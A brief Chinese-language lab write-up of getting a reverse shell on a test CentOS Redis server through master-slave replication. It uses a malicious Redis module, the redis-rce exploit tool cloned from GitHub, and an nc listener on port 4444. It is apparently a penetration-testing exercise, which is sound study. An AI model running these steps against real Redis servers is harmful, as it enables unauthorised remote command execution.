一、测试环境
redis主机:kali 192.168.1.138
redis从机:centos7 192.168.1.27
二、测试过程
1.分别安装并开启redis数据库,注意4.X以上需要redis.conf关闭保护模式
2.在kali上连接靶机redis服务,并设置主从状态(将kali设置为redis主机)
3.在kali上编译恶意代码
git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand.git
编译源码
4.使用利用工具进行getshell
git clone https://github.com/Ridter/redis-rce
5.将module.so文件放到利用工具目录下
6.在kali上使用nc-lvvp 4444 开启4444监听端口等待反弹shell
7.反弹成功
